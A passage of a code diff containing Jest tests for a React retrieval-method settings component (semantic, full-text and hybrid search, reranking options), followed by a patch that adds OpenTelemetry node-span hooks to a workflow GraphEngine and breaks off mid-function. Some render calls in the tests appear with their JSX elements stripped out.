renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.description')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.description')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.description')).toBeInTheDocument() + }) + + it('should only render semantic search when only semantic is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.semantic] + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.hybrid_search.title')).not.toBeInTheDocument() + }) + + it('should only render fullText search when only fullText is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.fullText] + renderComponent() + + expect(screen.queryByText('dataset.retrieval.semantic_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.hybrid_search.title')).not.toBeInTheDocument() + }) + + it('should only render hybrid search when only hybrid is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.hybrid] + renderComponent() + + expect(screen.queryByText('dataset.retrieval.semantic_search.title')).not.toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should render nothing when no retrieval methods are supported', () => { + mockSupportRetrievalMethods = [] + const { container } = renderComponent() + + // Only the wrapper div should exist + expect(container.firstChild?.childNodes.length).toBe(0) + }) + + it('should show RetrievalParamConfig for the active method', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + expect(screen.getByTestId('retrieval-param-config-semantic_search')).toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-full_text_search')).not.toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-hybrid_search')).not.toBeInTheDocument() + }) + + it('should show RetrievalParamConfig for fullText when active', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + }) + + expect(screen.queryByTestId('retrieval-param-config-semantic_search')).not.toBeInTheDocument() + expect(screen.getByTestId('retrieval-param-config-full_text_search')).toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-hybrid_search')).not.toBeInTheDocument() + }) + + it('should show RetrievalParamConfig for hybrid when active', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + }) + + expect(screen.queryByTestId('retrieval-param-config-semantic_search')).not.toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-full_text_search')).not.toBeInTheDocument() + expect(screen.getByTestId('retrieval-param-config-hybrid_search')).toBeInTheDocument() + }) + }) + + // Tests for props handling + describe('Props', () => { + it('should pass showMultiModalTip to RetrievalParamConfig', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: true, + }) + + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('true') + }) + + it('should default showMultiModalTip to false', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('false') + }) + + it('should apply disabled state to option cards', () => { + renderComponent({ disabled: true }) + + // When disabled, clicking should not trigger onChange + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(semanticOption).toHaveClass('cursor-not-allowed') + }) + + it('should default disabled to false', () => { + renderComponent() + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(semanticOption).not.toHaveClass('cursor-not-allowed') + }) + }) + + // Tests for user interactions and event handlers + describe('User Interactions', () => { + it('should call onChange when switching to semantic search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: true, + }), + ) + }) + + it('should call onChange when switching to fullText search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(fullTextOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.fullText, + reranking_enable: true, + }), + ) + }) + + it('should call onChange when switching to hybrid search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_enable: true, + }), + ) + }) + + it('should not call onChange when clicking the already active method', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).not.toHaveBeenCalled() + }) + + it('should not call onChange when disabled', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + disabled: true, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor"]') + fireEvent.click(fullTextOption!) + + expect(onChange).not.toHaveBeenCalled() + }) + + it('should propagate onChange from RetrievalParamConfig', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const updateButton = screen.getByTestId('update-top-k-semantic_search') + fireEvent.click(updateButton) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + top_k: 10, + }), + ) + }) + }) + + // Tests for reranking model configuration + describe('Reranking Model Configuration', () => { + it('should set reranking model when switching to semantic and model is valid', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: 'test-provider', + reranking_model_name: 'test-rerank-model', + }, + reranking_enable: true, + }), + ) + }) + + it('should preserve existing reranking model when switching', () => { + const onChange = jest.fn() + const existingModel = { + reranking_provider_name: 'existing-provider', + reranking_model_name: 'existing-model', + } + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: existingModel, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: existingModel, + reranking_enable: true, + }), + ) + }) + + it('should set reranking_enable to false when no valid model', () => { + mockIsRerankDefaultModelValid = false + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_enable: false, + }), + ) + }) + + it('should set reranking_mode for hybrid search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_mode: RerankingModeEnum.RerankingModel, + }), + ) + }) + + it('should set weighted score mode when no valid rerank model for hybrid', () => { + mockIsRerankDefaultModelValid = false + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_mode: RerankingModeEnum.WeightedScore, + }), + ) + }) + + it('should set default weights for hybrid search when no existing weights', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + weights: undefined, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + weights: { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: DEFAULT_WEIGHTED_SCORE.other.semantic, + embedding_provider_name: '', + embedding_model_name: '', + }, + keyword_setting: { + keyword_weight: DEFAULT_WEIGHTED_SCORE.other.keyword, + }, + }, + }), + ) + }) + + it('should preserve existing weights for hybrid search', () => { + const existingWeights = { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: 0.8, + embedding_provider_name: 'test-embed-provider', + embedding_model_name: 'test-embed-model', + }, + keyword_setting: { + keyword_weight: 0.2, + }, + } + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + weights: existingWeights, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + weights: existingWeights, + }), + ) + }) + + it('should use RerankingModel mode and enable reranking for hybrid when existing reranking model', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: 'existing-provider', + reranking_model_name: 'existing-model', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_enable: true, + reranking_mode: RerankingModeEnum.RerankingModel, + }), + ) + }) + }) + + // Tests for callback stability and memoization + describe('Callback Stability', () => { + it('should maintain stable onSwitch callback when value changes', () => { + const onChange = jest.fn() + const value1 = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText, top_k: 4 }) + const value2 = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText, top_k: 8 }) + + const { rerender } = render( + , + ) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + + rerender() + + fireEvent.click(semanticOption!) + expect(onChange).toHaveBeenCalledTimes(2) + }) + + it('should use updated onChange callback after rerender', () => { + const onChange1 = jest.fn() + const onChange2 = jest.fn() + const value = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }) + + const { rerender } = render( + , + ) + + rerender() + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange1).not.toHaveBeenCalled() + expect(onChange2).toHaveBeenCalledTimes(1) + }) + }) + + // Tests for component memoization + describe('Component Memoization', () => { + it('should be memoized with React.memo', () => { + // Verify the component is wrapped with React.memo by checking its displayName or type + expect(RetrievalMethodConfig).toBeDefined() + // React.memo components have a $$typeof property + expect((RetrievalMethodConfig as any).$$typeof).toBeDefined() + }) + + it('should not re-render when props are the same', () => { + const onChange = jest.fn() + const value = createMockRetrievalConfig() + + const { rerender } = render( + , + ) + + // Rerender with same props reference + rerender() + + // Component should still be rendered correctly + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + }) + + // Tests for edge cases and error handling + describe('Edge Cases', () => { + it('should handle undefined reranking_model', () => { + const onChange = jest.fn() + const value = createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + }) + // @ts-expect-error - Testing edge case + value.reranking_model = undefined + + renderComponent({ + value, + onChange, + }) + + // Should not crash + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + + it('should handle missing default model', () => { + mockRerankDefaultModel = undefined + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + ) + }) + + it('should use fallback empty string when default model provider is undefined', () => { + // @ts-expect-error - Testing edge case where provider is undefined + mockRerankDefaultModel = { provider: undefined, model: 'test-model' } + mockIsRerankDefaultModelValid = true + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: '', + reranking_model_name: 'test-model', + }, + }), + ) + }) + + it('should use fallback empty string when default model name is undefined', () => { + // @ts-expect-error - Testing edge case where model is undefined + mockRerankDefaultModel = { provider: { provider: 'test-provider' }, model: undefined } + mockIsRerankDefaultModelValid = true + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: 'test-provider', + reranking_model_name: '', + }, + }), + ) + }) + + it('should handle rapid sequential clicks', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor-pointer"]') + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + + // Rapid clicks + fireEvent.click(fullTextOption!) + fireEvent.click(hybridOption!) + fireEvent.click(fullTextOption!) + + expect(onChange).toHaveBeenCalledTimes(3) + }) + + it('should handle empty supportRetrievalMethods array', () => { + mockSupportRetrievalMethods = [] + const { container } = renderComponent() + + expect(container.querySelector('[class*="flex-col"]')?.childNodes.length).toBe(0) + }) + + it('should handle partial supportRetrievalMethods', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.semantic, RETRIEVE_METHOD.hybrid] + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should handle value with all optional fields set', () => { + const fullValue = createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_enable: true, + reranking_model: { + reranking_provider_name: 'provider', + reranking_model_name: 'model', + }, + top_k: 10, + score_threshold_enabled: true, + score_threshold: 0.8, + reranking_mode: RerankingModeEnum.WeightedScore, + weights: { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: 0.6, + embedding_provider_name: 'embed-provider', + embedding_model_name: 'embed-model', + }, + keyword_setting: { + keyword_weight: 0.4, + }, + }, + }) + + renderComponent({ value: fullValue }) + + expect(screen.getByTestId('retrieval-param-config-hybrid_search')).toBeInTheDocument() + }) + }) + + // Tests for all prop variations + describe('Prop Variations', () => { + it('should render with minimum required props', () => { + const { container } = render( + , + ) + + expect(container.firstChild).toBeInTheDocument() + }) + + it('should render with all props set', () => { + renderComponent({ + disabled: true, + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + showMultiModalTip: true, + onChange: jest.fn(), + }) + + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + describe('disabled prop variations', () => { + it('should handle disabled=true', () => { + renderComponent({ disabled: true }) + const option = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(option).toHaveClass('cursor-not-allowed') + }) + + it('should handle disabled=false', () => { + renderComponent({ disabled: false }) + const option = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(option).toHaveClass('cursor-pointer') + }) + }) + + describe('search_method variations', () => { + const methods = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, + ] + + test.each(methods)('should correctly highlight %s when active', (method) => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: method }), + }) + + // The active method should have its RetrievalParamConfig rendered + expect(screen.getByTestId(`retrieval-param-config-${method}`)).toBeInTheDocument() + }) + }) + + describe('showMultiModalTip variations', () => { + it('should pass true to child component', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: true, + }) + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('true') + }) + + it('should pass false to child component', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: false, + }) + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('false') + }) + }) + }) + + // Tests for active state visual indication + describe('Active State Visual Indication', () => { + it('should show recommended badge only on hybrid search', () => { + renderComponent() + + // The hybrid search option should have the recommended badge + // This is verified by checking the isRecommended prop passed to OptionCard + const hybridTitle = screen.getByText('dataset.retrieval.hybrid_search.title') + const hybridCard = hybridTitle.closest('div[class*="cursor"]') + + // Should contain recommended badge from OptionCard + expect(hybridCard?.querySelector('[class*="badge"]') || screen.queryByText('datasetCreation.stepTwo.recommend')).toBeTruthy() + }) + }) + + // Tests for integration with OptionCard + describe('OptionCard Integration', () => { + it('should pass correct props to OptionCard for semantic search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + const semanticTitle = screen.getByText('dataset.retrieval.semantic_search.title') + expect(semanticTitle).toBeInTheDocument() + + // Check description + const semanticDesc = screen.getByText('dataset.retrieval.semantic_search.description') + expect(semanticDesc).toBeInTheDocument() + }) + + it('should pass correct props to OptionCard for fullText search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + }) + + const fullTextTitle = screen.getByText('dataset.retrieval.full_text_search.title') + expect(fullTextTitle).toBeInTheDocument() + + const fullTextDesc = screen.getByText('dataset.retrieval.full_text_search.description') + expect(fullTextDesc).toBeInTheDocument() + }) + + it('should pass correct props to OptionCard for hybrid search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + }) + + const hybridTitle = screen.getByText('dataset.retrieval.hybrid_search.title') + expect(hybridTitle).toBeInTheDocument() + + const hybridDesc = screen.getByText('dataset.retrieval.hybrid_search.description') + expect(hybridDesc).toBeInTheDocument() + }) + }) +}) From bdccbb6e8679ca7d0ea808e681ecc53bbaf596bc Mon Sep 17 00:00:00 2001 From: heyszt <270985384@qq.com> Date: Tue, 16 Dec 2025 13:26:31 +0800 Subject: [PATCH 44/68] feat: add GraphEngine layer node execution hooks (#28583) --- .../workflow/graph_engine/graph_engine.py | 9 +- .../workflow/graph_engine/layers/__init__.py | 2 + api/core/workflow/graph_engine/layers/base.py | 27 +++ .../graph_engine/layers/node_parsers.py | 61 +++++ .../graph_engine/layers/observability.py | 169 ++++++++++++++ api/core/workflow/graph_engine/worker.py | 54 ++++- .../worker_management/worker_pool.py | 5 + api/core/workflow/nodes/base/node.py | 51 ++-- api/core/workflow/workflow_entry.py | 7 +- api/extensions/otel/decorators/base.py | 14 +- api/extensions/otel/runtime.py | 11 + .../workflow/graph_engine/layers/__init__.py | 0 .../workflow/graph_engine/layers/conftest.py | 101 ++++++++ .../graph_engine/layers/test_observability.py | 219 ++++++++++++++++++ 14 files changed, 682 insertions(+), 48 deletions(-) create mode 100644 api/core/workflow/graph_engine/layers/node_parsers.py create mode 100644 api/core/workflow/graph_engine/layers/observability.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... + + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. + + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. + """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not 